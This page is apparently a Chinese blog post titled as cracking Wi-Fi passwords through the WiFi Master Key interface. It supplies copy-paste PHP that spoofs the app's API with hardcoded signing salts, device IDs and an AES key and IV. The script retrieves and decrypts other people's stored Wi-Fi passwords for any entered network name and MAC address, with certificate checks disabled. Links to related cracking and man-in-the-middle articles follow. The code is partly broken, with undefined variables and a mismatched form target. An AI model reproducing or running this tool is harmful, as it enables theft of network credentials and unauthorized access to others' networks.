新建wifi.php,复制粘贴

<?php

$bssid = $_POST["bssid"] ;

$ssid = $_POST["ssid"] ;

if (isset( $bssid ) && isset( $ssid )){

//update salt

   $ret = request( $bssid , $ssid , md5(rand(1, 10000)));

   $ret = json_decode( $ret );

   $ret = request( $bssid , $ssid , $ret ->retSn);

   $ret = json_decode( $ret );

   if ( $ret ->retCd == 0){

     if ( $ret ->qryapwd->retCd == 0){

       $list = $ret ->qryapwd->psws;

       foreach ( $list as $wifi ){

         echo 'SSID: ' . $wifi ->ssid. "<br>" ;

         echo 'PWD: ' .decryptStrin( $wifi ->pwd). "<br>" ;

         echo 'BSSID: ' . $wifi ->bssid. "<br>" ;

         if ( $wifi ->xUser){

           echo 'xUser: ' . $wifi ->xUser. "<br>" ;

           echo 'xPwd: ' . $wifi ->xPwd. "<br>" ;

         }

       }

     }

     else {

       echo $ret ->qryapwd->retMsg;

     }

   }

}

function request( $bssid , $ssid , $salt , $dhid = 'ff8080814cc5798a014ccbbdfa375369' ){

   $data = array ();

   $data [ 'appid' ] = '0008' ;

   $data [ 'bssid' ] = $bssid ;

   $data [ 'chanid' ] = 'gw' ;

   $data [ 'dhid' ] = $dhid ;

   $data [ 'ii' ] = '609537f302fc6c32907a935fb4bf7ac4' ;

   $data [ 'lang' ] = 'cn' ;

   $data [ 'mac' ] = '60f81dad28dh' ;

   $data [ 'method' ] = 'getDeepSecChkSwitch' ;

   $data [ 'pid' ] = 'qryapwd:commonswitch' ;

   $data [ 'ssid' ] = $ssid ;

   $data [ 'st' ] = 'm' ;

   $data [ 'uhid' ] = 'a0000000000000000000000000000002' ;

   $data [ 'v' ] = '324' ;

   $data [ 'sign' ] = sign( $data , $salt );

   $curl = curl_init();

   curl_setopt( $curl , CURLOPT_URL, 'http://wifiapi02.51y5.net/wifiapi/fa.cmd' );

   curl_setopt( $curl , CURLOPT_USERAGENT, 'WiFiMasterKey/1.1.0 (Mac OS X Version 10.10.3 (Build 14D136))' );

   curl_setopt( $curl , CURLOPT_SSL_VERIFYPEER, false); // stop verifying certificate

   curl_setopt( $curl , CURLOPT_RETURNTRANSFER, true);

   curl_setopt( $curl , CURLOPT_POST, true); // enable posting

   curl_setopt( $curl , CURLOPT_POSTFIELDS, http_build_query( $data )); // post images

   curl_setopt( $curl , CURLOPT_FOLLOWLOCATION, true); // if any redirection after upload

   $r = curl_exec( $curl );

   curl_close( $curl );

   return $r ;

}

function registerNewDevice(){

   $salt = '1Hf%5Yh&7Og$1Wh!6Vr&7Rs!3vj#1Aa$' ;

   $data = array ();

   $data [ 'appid' ] = '0008' ;

   $data [ 'bssid' ] = $bssid ;

   $data [ 'chanid' ] = 'gw' ;

   $data [ 'dhid' ] = $dhid ;

   $data [ 'ii' ] = '609537f302fc6c32907a935fb4bf7ac9' ;

   $data [ 'lang' ] = 'cn' ;

   $data [ 'mac' ] = '60f81dad28de' ;

   $data [ 'method' ] = 'getDeepSecChkSwitch' ;

   $data [ 'pid' ] = 'qryapwd:commonswitch' ;

   $data [ 'ssid' ] = $ssid ;

   $data [ 'st' ] = 'm' ;

   $data [ 'uhid' ] = 'a0000000000000000000000000000001' ;

   $data [ 'v' ] = '324' ;

   $data [ 'sign' ] = sign( $data , $salt );

}

function sign( $array , $salt ){

   // 签名算法

   $request_str = '' ;

   // 对应apk中的 Arrays.sort 数组排序,测试PHP需用 ksort

   ksort( $array );

   foreach ( $array as $key => $value ) {

     $request_str .= $value ;

   }

   $sign = md5( $request_str . $salt );

   return strtoupper ( $sign );

}

function decryptStrin( $str , $keys = 'k%7Ve#8Ie!5Fb&8E' , $iv = 'y!0Oe#2Wj#6Pw!3V' , $cipher_alg =MCRYPT_RIJNDAEL_128){

   //Wi-Fi万能钥匙密码采用 AES/CBC/NoPadding 方式加密

   //[length][password][timestamp]

   $decrypted_string = mcrypt_decrypt( $cipher_alg , $keys , pack( "H*" , $str ),MCRYPT_MODE_CBC, $iv );

   return substr (trim( $decrypted_string ),3,-13);

} ?>

  新建index.html,复制粘贴

<form action="check_wifi.php" method="post">

  <p>WiFi的名称ssid: <input type="text" name="ssid" /></p>

  <p>mac地址bssid: <input type="text" name="bssid" /></p>

  <input type="submit" value="提交" />

</form>

  

PHP破解wifi密码(wifi万能钥匙的接口)的更多相关文章

  1. Wi-Fi万能钥匙:说是破解,其实有危险(转)

    Wi-Fi 万能钥匙如此危险,怎样做才能让这种可能严重侵害公众利益的 app 在中国消失? 这个“钥匙”为什么能够破解 Wi-Fi?它真的是“破解” Wi-Fi 吗?两年前我就有这个疑问了,原谅我对一 ...

  2. 手机WiFi万能钥匙查看破解的password和手机查询命令收集

    手机须要网络利用WiFi万能钥匙破解了WIFI的password.手机就能够上网了,但假设想在电脑上使用手机破解的Wifi热点上网就须要password,此时须要知道手机破解的password,WiF ...

  3. CDLinux环境下WiFi密码破解

    > 准备好所需软件以及上篇教程中使用Fbinstool制作的可启动U盘 2 > 解压CDLinux-0.9-spring-0412.iso到U盘的根目录  如图 3 > 打开fbin ...

  4. 怎么破解Wifi密码

    破解无络网络Wifi密码,让手机上Wifi不再受限. 方法/步骤 1 上网搜索并下载“Wfi万能钥匙”APK程序,然后将其安装到手机内存中.可以借助手机类管理软件将APK应用安装到手机中. 步骤阅读 ...

  5. 路由器安全——破解wifi密码,同时中间人攻击

    聊聊安全那些事儿 篇一:Wi-Fi安全浅析 2016-04-25 13:18:16 141点赞 712收藏 63评论 前言 近期,Wi-Fi相关的安全话题充斥着电视新闻的大屏幕,先是曝出了路由器劫持的 ...

  6. 第一步:卸载手机上的“WIFI万能钥匙”! 会分享自己家的wifi

    http://www.znds.com/tv-164866-1-1.html 楼主今日家中WIFI卡的不行,心想,20M的电信光纤没理由这么卡!于是就在网上查找了许多资料,接下来统一收集整理给大家!第 ...

  7. wifite硬核破解WiFi密码

    如题 楼主在这里分享下如何使用工具破解附近的WiFi 今天使用的工具是 wifite 现在都有WiFi万能钥匙了 暴力破解还有市场吗? 首先他俩的破解思路就不一样 wifi万能钥匙是根据云端数据库内容 ...

  8. 家中WIFI被人用WiFi万能钥匙共享后,我们应该怎么做?

    据之前WiFi万能钥匙官方称,其用户总数已经超过了8亿,且日活用户达到2亿,在海量APP中仅次于微信和QQ.可以想象有着数量如此庞大的用户,家里的WiFi是如何的"不保险". 而据 ...

  9. MAC系统下破解WIFI密码(亲测可用,含wifi密码字典)

    出差第二天,住的小区因为疫情被封,宿舍又没有wifi,看着附近满满的WIFI信号列表,wifi万能钥匙却一个都连接不上,心中一万匹CNM...于是电脑连上手机热点,然后各种折腾,终于破解了一个隔壁的w ...

随机推荐

  1. 【Python】进程3

    #练习: import time from multiprocessing import Pool def run(fn): #fn: 函数参数是数据列表的一个元素 time.sleep(1) ret ...

  2. vuejs 在移动端调起键盘并触发‘前往’按钮

    <template> <div class="display"> <form @submit.prevent> <input @keyup ...

  3. 常见Web应用程序漏洞

    不完善的身份验证措施 .这类漏洞包括应用程序登录机制中的各种缺陷,可能会使攻击者破解保密性不强的密码.发动蛮力攻击或完全避开登录. 不完善的访问控制措施.这一问题涉及的情况包括:应用程序无法为数据和功 ...

  4. Prepare paddle in Docker

    1. Install Docker sudo apt-get install -y docker.io a) pull repository from server in China, here is ...

  5. kafka definitive guide - reading notes

    一.认识Kafka 1)什么是sub/pub模型, 发布订阅模型   Publish/subscribe messaging is a pattern that is characterized by ...

  6. MongDB篇,第三章:数据库知识3

    MongDB    数据库知识3 修改器 $inc 对某个域的值进行加减修改 $mul 对某个域的值进行乘法修改 $min 如果筛选的文档指定的值小于min则不修改,如果大于min 给定的值则修改为m ...

  7. mac上不了网

    不知怎么回事勾选了socks代理导致ping的通但打不开网页软件登不了

  8. [LeetCode&Python] Problem 258. Add Digits

    Given a non-negative integer num, repeatedly add all its digits until the result has only one digit. ...

  9. C#线程、前后台线程

    C#线程.前后台线程 本文提供全流程,中文翻译. Chinar 坚持将简单的生活方式,带给世人!(拥有更好的阅读体验 -- 高分辨率用户请根据需求调整网页缩放比例) Chinar -- 心分享.心创新 ...

  10. 阿里云ECS服务器购买流程 (自定义配置购买、按月、按量购买)教程

    阿里ECS云服务器自定义购买流程 本文提供全图文流程,中文翻译. Chinar 坚持将简单的生活方式,带给世人!(拥有更好的阅读体验 -- 高分辨率用户请根据需求调整网页缩放比例) Chinar -- ...